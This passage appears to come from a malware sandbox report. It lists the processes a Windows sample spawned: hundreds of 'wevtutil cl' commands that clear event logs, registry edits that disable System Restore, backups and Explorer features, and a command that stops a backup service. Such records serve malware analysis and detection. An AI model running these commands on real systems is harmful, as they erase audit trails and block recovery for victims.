C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
1⤵
PID:1556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
1⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
1⤵
PID:220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
1⤵
PID:4648

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:2176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
1⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
1⤵
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
1⤵
PID:2336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
1⤵
PID:1872

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
1⤵
PID:3216

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
1⤵
PID:3688

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
1⤵
PID:4288

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"
1⤵
PID:512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"
1⤵
- Clears Windows event logs
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
1⤵
PID:3440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
1⤵
PID:2432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
1⤵
PID:4472

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
1⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"
1⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
1⤵
PID:5116

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
1⤵
PID:4820

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
1⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
1⤵
PID:4988

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
1⤵
PID:876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
1⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
1⤵
PID:1160

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
1⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
1⤵
PID:2076

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"
1⤵
PID:4852

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"
1⤵
PID:3524

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
1⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1156

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
1⤵
PID:3328

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
1⤵
PID:1324

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
1⤵
PID:4420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
1⤵
PID:3208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
1⤵
PID:220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
1⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
1⤵
PID:2176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
1⤵
PID:3236

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
1⤵
PID:4880

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
1⤵
PID:1640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
1⤵
PID:4664

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
1⤵
PID:4596

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
1⤵
PID:412

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
1⤵
PID:3744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
1⤵
PID:2512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
1⤵
PID:1108

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:4516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
3⤵
PID:1108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
1⤵
PID:2628

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
1⤵
PID:4928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
1⤵
PID:3780

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
1⤵
PID:5000

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
1⤵
PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
1⤵
- Clears Windows event logs
PID:2904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
1⤵
PID:2212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
1⤵
PID:972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
1⤵
PID:4440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
1⤵
PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
1⤵
PID:748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
1⤵
PID:3176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
1⤵
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
1⤵
PID:4932

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
1⤵
PID:4716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
1⤵
PID:456

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
1⤵
PID:468

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
1⤵
PID:4388

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
1⤵
PID:920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
1⤵
PID:952

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
1⤵
PID:4664

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
1⤵
PID:1320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
1⤵
PID:320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
1⤵
PID:3356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
1⤵
PID:816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
1⤵
PID:3772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"
1⤵
PID:3596

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"
1⤵
PID:4668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
1⤵
PID:4956

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
1⤵
PID:4288

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:2692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
1⤵
PID:512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
1⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
1⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
1⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
1⤵
PID:5116

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
1⤵
PID:4820

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
1⤵
PID:4988

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
1⤵
PID:2828

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
1⤵
PID:876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
1⤵
PID:1160

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
1⤵
PID:2464

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
1⤵
PID:972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
1⤵
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
1⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
1⤵
PID:4396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
1⤵
PID:4892

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
1⤵
- Clears Windows event logs
PID:1604

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
1⤵
PID:924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
1⤵
PID:4036

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
1⤵
PID:692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
1⤵
PID:4420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
1⤵
PID:3108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
1⤵
PID:2228

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
1⤵
PID:2844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
1⤵
- Clears Windows event logs
PID:372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
1⤵
PID:4904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
1⤵
PID:5108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
1⤵
PID:4052

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
1⤵
PID:1452

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
1⤵
- Clears Windows event logs
PID:952

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
1⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
1⤵
- Clears Windows event logs
PID:1668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
1⤵
PID:1232

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
1⤵
- Clears Windows event logs
PID:1684

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
1⤵
PID:1824

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
1⤵
PID:1612

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
1⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
1⤵
PID:4616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
1⤵
PID:4516

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
1⤵
PID:780

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
1⤵
PID:1420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
1⤵
PID:1564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
1⤵
PID:1140

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
1⤵
PID:4060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
1⤵
PID:4804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
1⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
1⤵
PID:1160

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
1⤵
PID:4616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
1⤵
PID:2464

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
1⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
1⤵
PID:4144

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
1⤵
PID:792

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1252

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
1⤵
PID:1252

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
1⤵
PID:5032

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
1⤵
PID:3828

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
1⤵
PID:3364

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
1⤵
PID:1792

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
1⤵
PID:948

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
1⤵
PID:1556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
1⤵
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
1⤵
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"
1⤵
PID:112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
1⤵
PID:3904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
1⤵
PID:2196

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
1⤵
PID:1320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
1⤵
PID:4596

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
1⤵
PID:5076

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
1⤵
PID:320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppSruProv"
1⤵
PID:816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"
1⤵
PID:2548

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
1⤵
PID:5104

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:4344

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
1⤵
PID:3336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"
1⤵
PID:1320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
1⤵
PID:4336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"
1⤵
PID:1232

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:4336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
1⤵
PID:4344

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
1⤵
PID:4564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"
1⤵
PID:5004

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
1⤵
PID:1608

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"
1⤵
PID:1452

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
1⤵
PID:2680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
1⤵
PID:4052

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
1⤵
- Clears Windows event logs
PID:2696

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
1⤵
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"
1⤵
PID:4880

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
1⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
1⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
1⤵
- Clears Windows event logs
PID:2432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
1⤵
PID:3352

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
1⤵
PID:2796

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
1⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
1⤵
PID:4928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
1⤵
PID:876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
1⤵
PID:4392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
1⤵
PID:3184

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
1⤵
PID:4556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
1⤵
PID:2260

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
1⤵
- Clears Windows event logs
PID:928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
1⤵
PID:4084

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
1⤵
PID:4440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
1⤵
PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
1⤵
PID:4144

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
1⤵
PID:4428

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
1⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
1⤵
PID:212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
1⤵
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
1⤵
PID:4716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
1⤵
PID:456

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
1⤵
PID:2280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
1⤵
PID:1444

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
